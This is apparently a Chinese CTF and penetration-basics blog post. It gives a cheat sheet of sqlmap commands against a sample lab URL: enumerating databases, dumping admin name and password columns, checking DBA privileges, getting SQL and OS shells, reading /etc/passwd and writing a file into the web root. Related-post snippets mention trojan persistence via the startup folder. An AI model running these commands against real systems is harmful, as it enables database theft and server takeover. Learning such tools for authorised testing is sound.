Sqlmap简单粗暴

最新推荐文章于 2021-05-17 17:15:43 发布
最新推荐文章于 2021-05-17 17:15:43 发布
阅读量274 收藏 5
点赞数
分类专栏: ctf 渗透基础
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44740377/article/details/101116538
版权

 

Sqlmap是一个专业的SQL注入工具,用法也很多,具体可以用"sqlmap -hh"查看完整的命令帮助文档,我这只是给大家分享一些最常用的Sqlmap用法:

 

一、Sqlmap注入篇

 

1、检查注入点

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11

 

2、爆所有数据库信息

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --dbs

 

爆当前数据库信息

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-db

 

3、列出指定数据库所有的表名

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D fujieace --tables

'fujieace' 为指定数据库名称

 

4、列出指定表名的所有列名

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin --columns

'admin' 为指定表名称

 

5、dump打印输出表名指定列名字段的值数据

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin -C name,password --dump

'name,password' 为指定字段名称

 

二、Sqlmap用户权限篇

 

1、列出数据库管理系统用户:

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --users

 

查看当前连接数据库用户:

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-user

 

2、判断当前用户是否是DBA?

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --is-dba

 

3、查看用户权限:

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges -U fujieace

 

三、Sqlmap文件操作与shell提权篇

 

1、sql shell

这里通过sqlmap可以直接获取一个sql shell,直接执行sql语句进行交互。

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --sql-shell
sql-shell> select version();

 

注意:这里由于进入了sql shell可以执行sql语句了,也可以用 load data infile、load_file、into outfile等函数来进行文件读取或写入;

 

2、cmd shell

这里通过sqlmap可以直接获取一个cmd shell,直接执行cmd命令进行交互。

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-shell
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-cmd=ipconfig

 

3、读取服务器上指定文件

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=/etc/passwd
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=d:/test.txt

 

4、写入本地文件到服务器上

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-write /test/test.txt --file-dest /var/www/html/1.txt

 

 

有道云:文档:Linux提权.note
链接:http://note.youdao.com/noteshare?id=949a8be542852f8f7bdc2c9404d8bf5f

夜车星繁
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLmap简单使用
11-03
SQLmap是一款用来检测与利用SQL注入漏洞的免费开源自动化工具,目前支持的数据库是MySQL、Oracle、PostgreSQLSQL Server、Access、DB2、SQLite、Sybase等。没有图形化界面,通过...下面简单介绍一下sqlmap的使用。
sqlmap一次实践暴库
Action
06-23 922
http://waning411.blog.51cto.com/4909368/1398926
一次使用SQLMAP的过程
子曰小玖的博客
06-14 520
url:http://www.microtek.com.cn/happystudy/happystudy_info.php?idnow=4 第一步: -u 注入地址 --dbms "Mysql" --current-user 获取当前用户名 [root@Hacker~]# Sqlmap-uhttp://www.microtek.com.cn/happystudy/happystudy...
ibatis 实现分页查询 简单粗暴
技术杂货铺
08-29 3820
sqlMap中要有两个方法:count、pageSelect                       select count(*) from t_dat_dict     ]]>                        三个参数,不同的数据库可以根于此三个参数属性应用不同的分页实现 -->                  select
Kali工具库之sqlmap
辰鬼的博客
05-17 3716
自动SQL注入工具。 原文: SYNOPSIS python3 sqlmap [options] 意译: 选项: -h, --help 显示基本帮助信息并退出 -hh 显示高级帮助信息并退出 --version 显示程序的版本号并退出 -v VERBOSE 详细程度:0-6(默认为1) 目标: 必须提供这些选项中的至少一个来定义目标 -u URL, --url=URL 目标网址(例如“ http://www.s
SQLmap压缩包,SQLmap压缩包
06-07
SQLmap压缩包
SQLMAP Windows
02-23
SQLMAP Windows
sqlmap-master
01-04
sqlmap-master
SQLMap完成安全测试
03-03
sqlmap是一个开源的渗透测试工具,它可以自动化检测和利用SQL注入漏洞并接管数据库服务器。它有一个强大的检测引擎,许多适合于终极渗透测试的良好特性和众多的操作选项,从数据库指纹、数据获取到访问底层文件系统...
burpsuite检测xss漏洞
夜车星繁的博客
07-17 7499
burpsuite检测xss漏洞 XSS(跨站脚本攻击)漏洞是Web应用程序中最常见的漏洞之一,它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的,比如获取用户的cookie,导航到恶意网站,携带木马等。根据其触发方式的不同,通常分为反射型XSS、存储型XSS和DOM-base型XSS。漏洞“注...
wireshark
夜车星繁的博客
06-19 5648
晚上看渗透教程看的很懵。。。 在此水一篇教程,接下来会努力学习写出好的博客。 Wireshark界面说明 过滤器表达式书写是wireshark使用的核心,但在此之前,很多初学者还会碰到一个难题,就是感觉wireshark界面上很多东西不懂怎么看。其实还是挺明了的我们下面简单说一下,如下图。 1号窗口展示的是wireshark捕获到的所有数据包的列表。注意最后一列Info列是wires...
FTP服务器漏洞靶场
夜车星繁的博客
06-24 2761
之前做过一道靶场;FTP服务器漏洞 需要用到一些DOS命令与FTP下一些重要的命令,在此整理下姑且作一篇博客, 查看题目: 查看靶机IP后,PING了一下: 随便输入一个用户名: 看来需要爆破用户名和密码。 可是我太菜了不太会,上网搜了下关于FTP服务器的一些知识,知道它也许存在匿名登陆; 于是试了试; 登陆成功界面: 登陆成功后,下载下其中有用文件并查看: ...
linux tar压缩解压缩命令 dpkg命令
夜车星繁的博客
06-16 1373
渗透课程进行到了access注入这一节课,感觉这是我的瓶颈,这节课背后有更高阶的知识等待着我去接触。 这次博客就先写做杂项题经常遇到的linux系统下一些语法,下次博客认认真真写web渗透。 Linux下的tar压缩解压缩命令 tar -c: 建立压缩档案 -x:解压 -t:查看内容 -r:向压缩归档文件末尾追加文件 -u:更新原压缩包中的文件 这五个是各自独立的命令,压缩解...
windows渗透基础
夜车星繁的博客
06-12 519
用户目录 : 启动目录,存放开机自启动程序,脚本等 把木马放在这个目录下,就会开机自启动(重要) win10系统为了保证系统安全,默认禁用了Administrator账户,需要手动开启 管理员cmd:net user administrator /active:yes windows 目录: windows\System32\config\SAM #存放windows账号...
合天网安实验室sql注入实验一 WRITE UP
夜车星繁的博客
11-15 487
在虚拟机chrome输入靶场网址: 10.1.1.11:81 打开实验一。 此时用到语句: name = root' and '1' = '1 name = root' and '1' = '2 接下来用order by 语句: root' order by 4%23 root' order by 5%23 root' order b...
XSS
夜车星繁的博客
07-07 352
今天接触了很多新知识,一时写不下这篇博客。明天又很忙。在此把之前学的XSS整理下: xss攻击可以分成两种类型: 非持久型攻击 持久型攻击 下面我们通过具体例子,了解两种类型xss攻击。 1.非持久型xss攻击 顾名思义,非持久型xss攻击是一次性的,仅对当次的页面访问产生影响。非持久型xss攻击要求用户访问一个被攻击者篡改后的链接,用户访问该链接时,被植入的攻击脚本被用户游...
黑客学习 Access注入 基础部分
夜车星繁的博客
06-23 258
见识了很多工具,自己把大部分都下载了下来。大部分ctf中能用到的功能也比较容易学。 就快要放暑假了,这是我的大学的第二个学期,相比于第一学期我进步了更多;在实验室的日子大部分都是充实的,坐下来安静的学习,有时在跑神的一小会儿会想起别的,虽然或多或少的影响效率,但思想的发散也算是另一种方式的休息。学习是痛苦的。痛苦伴随着人们的内心的成长。 Access注入 注入方法 联合查询法(兼容...
burp suite 略微高阶入门 夜车星繁的博客
夜车星繁的博客
07-05 240
刚刚放假的这两天有点忙,没有多少静下来心学习的时间。 SSL直连和隐形代理 SSL直连的设置主要用于指定的目的服务器直接通过SSL连接,而通过这些连接的请求或响应任何细节将在Burp代理拦截视图或历史日志中可见。通过SSL连接传递可以并不是简单地消除在客户机上SSL错误的情况下有用。比如说,在执行SSL证书的移动应用。如果应用程序访问多个域,或使用HTTP和HTTPS连接的混合,然后通过...
sqlmap kali
最新发布
04-11
SQLMap是一款开源的自动化SQL注入工具,用于检测和利用Web应用程序中的SQL注入漏洞。它是基于Python编写的,并且在Kali Linux等渗透测试和安全评估工具中广泛使用。 SQL注入是一种常见的Web应用程序漏洞,攻击者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值